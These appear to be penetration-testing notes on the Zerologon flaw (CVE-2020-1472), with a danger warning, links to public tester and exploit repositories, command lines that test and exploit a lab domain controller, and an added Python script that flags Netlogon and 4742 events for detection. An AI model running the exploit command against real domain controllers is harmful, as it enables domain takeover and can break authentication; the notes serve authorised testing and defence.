What Is Zerologon?
EXTREMELY DANGEROUS
- What it does: Allows an attacker to take over a Domain Controller (DC) in seconds by exploiting a flaw in the Netlogon protocol.
- Why it's risky: Running this exploit can break authentication across the entire domain. If something goes wrong, recovery may not be possible without a backup.
- Verdict: DO NOT RUN this exploit unless it is in a controlled environment (e.g., a test lab) and has been explicitly approved by the client.
GitHub Repo for Attacking/Testing Scripts
https://github.com/dirkjanm/CVE-2020-1472
https://github.com/SecuraBV/CVE-2020-1472
Testing
python3 zerologon_tester.py <dc-name> <dc-ip>
python3 zerologon_tester.py HYDRA-DC 192.168.150.128


Attack
python3 cve-2020-1472-exploit.py HYDRA-DC 192.168.150.128
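
Detection (added example, not part of the original notes or of either repository above): a defender reviewing a DC after the commands above can triage exported Windows events for the Netlogon System log IDs 5827-5831 and for Security event 4742, where a DC machine account password is set by ANONYMOUS LOGON. The dict keys are a hypothetical export schema and the sample records are constructed; a 4742 hit still needs analyst confirmation.

```python
# Added example: triage exported Windows events for Zerologon (CVE-2020-1472) signs.
# Dict keys below are a hypothetical export schema, not a Windows or tool format.

NETLOGON_EVENTS = {  # System log IDs added by the August 2020 Netlogon update
    5827: "denied vulnerable Netlogon connection (machine account)",
    5828: "denied vulnerable Netlogon connection (trust account)",
    5829: "allowed vulnerable Netlogon connection",
    5830: "allowed vulnerable connection by policy (machine account)",
    5831: "allowed vulnerable connection by policy (trust account)",
}

def triage(events, dc_accounts):
    """Return (severity, message) tuples for events worth an analyst's attention."""
    dcs = {name.upper() for name in dc_accounts}
    findings = []
    for ev in events:
        eid = ev.get("event_id")
        if eid in NETLOGON_EVENTS:
            # Denied means enforcement worked; allowed means the DC is still exposed.
            severity = "blocked" if eid in (5827, 5828) else "exposed"
            findings.append((severity, f"{eid}: {NETLOGON_EVENTS[eid]} from {ev.get('machine', '?')}"))
        elif eid == 4742:
            # Security log 4742 = computer account changed. A DC machine account whose
            # password was set by ANONYMOUS LOGON matches a successful Zerologon reset.
            target = ev.get("target_account", "").upper()
            subject = ev.get("subject_account", "").upper()
            pwd_changed = ev.get("password_last_set", "-") != "-"
            if target in dcs and subject == "ANONYMOUS LOGON" and pwd_changed:
                findings.append(("critical", f"4742: {target} password reset by ANONYMOUS LOGON"))
    return findings

# Constructed sample records (HYDRA-DC is the lab DC name used on this page).
SAMPLE_EVENTS = [
    {"event_id": 5829, "machine": "LEGACY-APP01"},
    {"event_id": 4742, "target_account": "HYDRA-DC$", "subject_account": "ANONYMOUS LOGON",
     "password_last_set": "9/14/2020 10:02:11 AM"},
    {"event_id": 4742, "target_account": "WS-042$", "subject_account": "WS-042$",
     "password_last_set": "9/14/2020 10:05:40 AM"},
    {"event_id": 4742, "target_account": "HYDRA-DC$", "subject_account": "ANONYMOUS LOGON",
     "password_last_set": "-"},
    {"event_id": 5827, "machine": "UNKNOWN-HOST"},
]

if __name__ == "__main__":
    for severity, message in triage(SAMPLE_EVENTS, ["HYDRA-DC$"]):
        print(f"[{severity}] {message}")
```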

